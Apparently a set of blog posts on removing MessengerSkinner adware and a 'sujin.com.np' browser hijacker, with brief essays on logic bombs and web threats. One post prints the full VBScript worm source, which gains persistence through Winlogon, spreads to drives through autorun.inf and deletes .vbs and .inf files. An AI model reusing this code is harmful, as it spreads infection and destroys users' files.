How to remove messengerskinner.exe?

MessengerSkinner.exe is a part of MessengerSkinner software. MessengerSkinner is a potentially unwanted application that may drop a copy of Trojan.Skintrim on to the computer. It may also display pop-up advertisements on the computer. Here is a full process on how to remove it.

1. Temporarily Disable System Restore (Windows Me/XP).
2. Update the virus definitions.
3. Uninstall Messenger Skinner
a) Click Start > Settings > Control Panel or Start > Control Panel (this varies with the operating system).
b) In the Control Panel window, double-click Add/Remove Programs.
c) Click Messenger Skinner to remove.
d) Click Add/Remove, Change/Remove, or Remove (this varies with the operating system). Follow the prompts.

4. Reboot computer in SafeMode
5. Run a full system scan and clean/delete all infected file(s)
6. Delete/Modify any values added to the registry.
Navigate to and delete the following registry entries:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\”[RANDOM CHARACTERS]” = “c:\documents and settings\administrator\local settings\application data\[RANDOM CHARACTERS].exe [RANDOM CHARACTERS]”
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\”messengerskinner” = “C:\Program Files\MessengerSkinner\MessengerSkinner.exe”

Navigate to and delete the following registry subkeys:
HKEY_CURRENT_USER\Software\LanConfig
HKEY_CURRENT_USER\Software\MessengerSkinner
HKEY_LOCAL_MACHINE\SOFTWARE\MessengerSkinner
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MessengerSkinner
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\[RANDOM CHARACTERS]

7. Exit registry editor and restart the computer.

8. In order to make sure that threat is completely eliminated from your computer, carry out a full scan of your computer using AntiVirus and Antispyware Software. You can also try Online Virus Scanner which doesn’t need any installation.

The solutions for ‘sujin.com.np’ virus

Just few days ago I mentioned about this virus called changes the homepage of Internet Explorer to ‘sujin.com.np’ and does some other manipulation in the registry. Well, I encountered this so called virus aned I alsofound of its solution through various resources. To remove this virus you can follow the process below :

1. From the start menu click ‘Run’ -> type ‘Regedit’

2. Registry Editor will open

3. In the Registry Editor, go to Edit menu and press find

4. In the find dialog box type - virusremoval.vbs and press find next button

5. The search will end at some folder in the registry at the key - "userint"; doubleclick it; you will find many paths separated by commas - eg: c:windows/system32/userinit.exe,c:/windo... and so on. Among those paths you will find "C:\windows\system32\virusremoval.vbs". Delete the path. Ensure that remaining paths are unaltered so that your genuine scripts are not affected.

6. Press F3 (find next) to see if the same path exists somewhere else in your registry. If found again at some other place remove the path there also.

7. Repeat F3 until you get a message that search has finished.

6. Change your home page to your usual one. You will notice that though your home page has stopped from changing back to ‘sujin.com.np’, still your title bar is showing ‘sujin.com.np’.

7. To change this back to normal, first change your homepage, and again open the ‘Registry Editor’ and press find in edit menu and type ‘sujin.com.np’ without quotes. You will find the key - "Window Title". Double click the key and type "Windows Internet Explorer" or any other text you would like to have in the title bar. Please note that you have to change the key at two places. Press find next f3 till you receive the message that search has finished to ensure that you have changed at both the places.

Well, this is a pretty long procedure. Instead of doing all this you can just download a scanner for this virus from http://worldlink.com.np/support/download/software/Scanner.exe and run a scan and this virus will be easily removed.

‘sujin.com.np’ virus or what?

Debt Consolidation Loans

Secured Loan Mortgages Online Search Online

It was just today that I noticed whenever I opened my Internet Explorer; the title of my browser shows ‘sujin.com.np’ and my home page has been changed to sujin.com.np. I was scared for a moment. What could have happened? Did someone hacked into my explorer and stealing my private data? I have free edition of AVG installed and I am regularly updating it but it couldn’t detect the so called ‘sujin.com.np’ virus.
Anyways, I knew that the only thing that could solve my problem was the internet and as I predicted I found many solutions. Actually, this might got into my computer through someone’s flash drive or something. It was just some script programmed by some guy from Nepal in Visual Basic that changed some registry settings and copied itself to all drives in root directory.
The VBS file in notepad looked like this:

'************************************************* *****************
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'************************************************* *****************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them.
'************************************************* *****************
'************************************************* *****************
'Program developed by
'Sujin Joshi
'http://Sujin.com.np
'sujinjoshi@gmail.com
Option Explicit
On Error Resume Next

Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives, InDrive,ReadAll,AllFile,WriteAll,Del,Chg,folder,fi les,Delete,auto,root

Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop


Count=Drv.DriveType

Do
If Not Fso.FileExists(SystemDir & "\VirusRemoval.vbs") then
set WriteAll = Fso.CreateTextFile(SystemDir & "\VirusRemoval.vbs",2,true)
WriteAll.Write AllFile
WriteAll.close
set WriteAll = Fso.GetFile(SystemDir & "\VirusRemoval.vbs")
WriteAll.Attributes = -1
End If

Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","Sujin.com.np"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableRegistryTools","0","REG_DWORD "
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://sujin.com.np/"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\VirusRemoval.vbs"

For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=ro ot Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
For Each files In folder.Files
auto=Left(files.Name,7)
If UCase(auto)=UCase("autorun") Then
Set Delete = Fso.DeleteFile(root & files.Name,true)
End If
Next
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if

If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"

If Fso.FileExists(Drives.Path & "\ravmon.exe") Then
Fso.DeleteFile(Drives.Path & "\ravmon.exe")
End If
If Fso.FileExists(Drives.Path & "\sxs.exe") Then
Fso.DeleteFile(Drives.Path & "\sxs.exe")
End If
If Fso.FileExists(Drives.Path & "\winfile.exe") Then
Fso.DeleteFile(Drives.Path & "\winfile.exe")
End If
If Fso.FileExists(Drives.Path & "\run.wsh") Then
Fso.DeleteFile(Drives.Path & "\run.wsh")
End If

If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
If Not Fso.FileExists(Drives.Path & "\VirusRemoval.vbs") Then
Set WriteAll=Fso.CreateTextFile(Drives.Path & "\VirusRemoval.vbs",2,True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\VirusRemoval.vbs")
WriteAll.Attributes = -1
End If

If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
Chg.Attributes = -8
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
else
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
End if
End If
End If
End if
End If
Next

if Count <> 1 then
Wscript.sleep 10000
end if
loop while Count<>1

sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCase(Cut)=UCase(file2find) Then
If oFile.Name <> "VirusRemoval.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub

A post in the boyutal’s blog says that it’s just a harmless VBScript file installed in your computer which just:

1.) Modifies registry settings to do tasks such as Disabling the Access To Taskbar, Setting The Start Page of Internet Explorer to "sujin.com.np" and modifies the UserInit settings to execute Virusremoval.vbs

2.) Stores a copy of itself to all Drives in root directory.

3.) Removes all vbs files in Windows directory and Root directory and all inf files in root directories of drives.

4.) Removes ravmon.exe, sxs.exe, winfile.exe and run.wsh.(Maybe these are the files of some malware that its author wants to remove)

5.) Stores VirusRemoval.vbs in root and adding the autorun.inf to make sure that it auto executes if it's installed in a removable disk (i.e. flashdrives).

And that’s it........it's harmless ..

I don’t know I still think there is something fishy about this.

Logic Bomb

One of the oldest types of program threat, predating viruses and worms is the Logic Bomb. The Logic Bomb is code embedded in some legitimate program that is set to ‘explode’ when certain conditions are met. E.g. of conditions that can be used to trigger for a Logic Bomb are the presence or absence of certain files, a particular day of a week or date, or a particular user running the application. Once triggered, a bomb may alter or delete data or files, cause a machine halt, or do some other damage. A striking example of how Logic Bombs can be employed was the cars of Tim Lloyd, who was convicted of setting Logic Bomb that cost his employer, Omega Engineering more than $10 million, derailed its corporate growth strategy, and eventually led to the layoff of 80 workers [GAUD00]. Ultimately, Lloyd was sentenced to 41 months in prison and ordered to pay $2 million in restitution.

Web pages itself are more dangerous than viruses

In the early days, when Web pages were just static HTML files, they did not contain executable code. Now, they often contain small programs, including Java applets, ActiveX controls, and JavaScripts. Downloading and executing such mobile code is obviously a massive security risk. For few days from now on, I'll be talking more on Applets, ActiveX controls, and JavaScripts. So, please bear me.

Java applets small Java programs compiled to a stack-oriented machine language called JVM (Java Virtual Machine). They can be placed on a Web page for downloading along with the page. After the page is loaded, the applets are inserted into a JVM interpreter inside the browser.

When an applet tries to use a system resource, its call is passed to a security monitor for approval. The monitor examines the call in light of the local security policy and then makes a decision to allow or reject it. In this way, it is possible to give applets access to some resources but not all. Unfortunately, the reality is that the security model works badly and that bugs in it crop up all the time.

Internet threats

Internet is common now days and with internet threat relating to it is also widespread. People who are very good at programming, who know how computer system and networking works very well engage in hacking others computers or spreading worms, virus, Trojan horse, etc to irritate users. Since, internet links the computer of the whole world in a single network, anyone from anywhere in the world can have access to any computer in the world connected to the internet. So, it’s a big ease for the users to do their part. Most common internet threats we can come across in our daily lives is hacking (obsessive use or unauthorized entry and use of computer system) and computer virus and worms.

One thing users can to protect themselves from such threats is use firewall and update their antivirus softwares regularly. I won’t say that using firewalls and updated antivirus s/w completely immunes your system against such threats but it surely protects you system to certain extend. Users too on theirs side should be careful while surfing and opening visiting sites or clicking any link.